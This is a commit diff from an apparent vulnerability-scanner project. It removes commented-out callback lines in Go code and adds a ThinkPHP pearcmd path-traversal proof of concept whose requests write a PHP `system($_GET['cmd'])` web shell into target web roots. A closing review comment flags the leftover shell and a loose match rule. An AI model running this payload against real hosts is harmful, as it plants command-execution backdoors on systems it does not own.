Projects STRLCPY afrog Commits 96b400f3
  • ■ ■ ■ ■ ■ ■
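--- a/pkg/core/checker.go
+++ b/pkg/core/checker.go
@@ -40,14 +40,12 @@
  defer func() {
  if r := recover(); r != nil {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  }
  }()
 
  // check target alive.
  if targetlive.TLive.HandleTargetLive(target, -1) == -1 || len(target) == 0 {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
@@ -75,14 +73,12 @@
  c.OriginalRequest, err = http.NewRequest("GET", target, nil)
  if err != nil {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
  tempRequest, err := http2.ParseRequest(c.OriginalRequest)
  if err != nil {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
  c.VariableMap["request"] = tempRequest
@@ -103,7 +99,6 @@
 
  if targetlive.TLive.HandleTargetLive(target, -1) == -1 || len(target) == 0 {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
@@ -146,25 +141,21 @@
 
  if rule.StopIfMismatch && !isMatch {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
  if rule.StopIfMatch && isMatch {
  c.Result.IsVul = true
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
  if matchCondition == poc.STOP_IF_FIRST_MISMATCH && !isMatch {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
  if matchCondition == poc.STOP_IF_FIRST_MATCH && isMatch {
  c.Result.IsVul = true
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
@@ -173,12 +164,10 @@
  isVul, err := c.CustomLib.RunEval(pocItem.Expression, c.VariableMap)
  if err != nil {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
  c.Result.IsVul = isVul.Value().(bool)
- // c.Options.ApiCallBack(c.Result)
 
  return err
 }
@@ -220,7 +209,6 @@
  // check target alive.
  if targetlive.TLive.HandleTargetLive(target, -1) == -1 || len(target) == 0 {
  c.Result.IsVul = false
- // c.Options.ApiCallBack(c.Result)
  return err
  }
 
@@ -231,7 +219,6 @@
  targetlive.TLive.AddRequestTarget(target+gopocName, 2)
  c.Result.IsVul = false
  c.Result.PocInfo = gpa.Poc
- // c.Options.ApiCallBack(c.Result)
  return err
  }
  targetlive.TLive.AddRequestTarget(target+gopocName, 2)
@@ -245,7 +232,6 @@
  c.Result.AllPocResult = append(c.Result.AllPocResult, &PocResult{ResultRequest: v.ResultRequest, ResultResponse: v.ResultResponse, IsVul: v.IsVul})
  }
  }
- // c.Options.ApiCallBack(c.Result)
 
  return nil
 }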
  • ■ ■ ■ ■ ■
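--- a/pocs/temp/afrog-pocs/vulnerability/thinkphp-lang-rce.yaml
+++ b/pocs/temp/afrog-pocs/vulnerability/thinkphp-lang-rce.yaml
@@ -15,4 +15,9 @@
  method: GET
  path: "/public/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
  expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
-expression: r0()
+ r1:
+ request:
+ method: GET
+ path: "/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
+ expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
+expression: r0() || r1()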
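Review bot: The new `r1` request, like `r0`, makes the scanner write a file containing `system($_GET['cmd'])` into the web root of every host it checks, and nothing visible in this hunk removes it, so a scan leaves a command-execution endpoint behind on vulnerable targets. For detection an inert body is enough, for example one that only prints a random marker, followed by a request that confirms the marker and a comment in the PoC that `{{fileName}}` must be deleted afterwards. The match on `response.status == 200 && response.body.bcontains(b'CONFIGURATION')` also looks loose, since any 200 page containing that word satisfies it; tying the expression to the written file would cut false positives. `r1` repeats `r0` except for the `/public` prefix, and the rule starts above the hunk, so whether `fileName` is randomised per run cannot be seen here.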